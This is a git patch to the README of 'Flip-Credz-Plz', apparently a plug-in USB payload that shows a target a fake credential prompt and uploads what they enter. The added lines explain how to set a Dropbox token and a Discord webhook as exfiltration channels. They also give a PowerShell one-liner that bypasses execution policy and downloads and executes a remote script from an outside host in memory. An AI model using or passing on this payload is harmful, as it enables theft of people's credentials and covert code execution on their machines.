From 41d214067ae11a048897c81138ac8e2eeafe5860 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sun, 18 Dec 2022 22:08:25 -0600 Subject: [PATCH] Update README.md --- Payloads/Flip-Credz-Plz/README.md | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/Payloads/Flip-Credz-Plz/README.md b/Payloads/Flip-Credz-Plz/README.md index 8a4187c..5f651f0 100644 --- a/Payloads/Flip-Credz-Plz/README.md +++ b/Payloads/Flip-Credz-Plz/README.md @@ -41,8 +41,13 @@ Once the target enters their credentials their information will be uploaded to y * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +* You know longer need to host your own version of this script +* `$db` is the variable that holds your DropBox token +* `$dc` is the variable that holds your discord webhook +* Fill in either or variable or both to set your exfil method + ``` -powershell -noexit -ep bypass $db='';iwr https://jakoby.lol/35k | iex +powershell -noexit -ep bypass $dc='';$db='';iwr https://jakoby.lol/35k | iex ```

(back to top)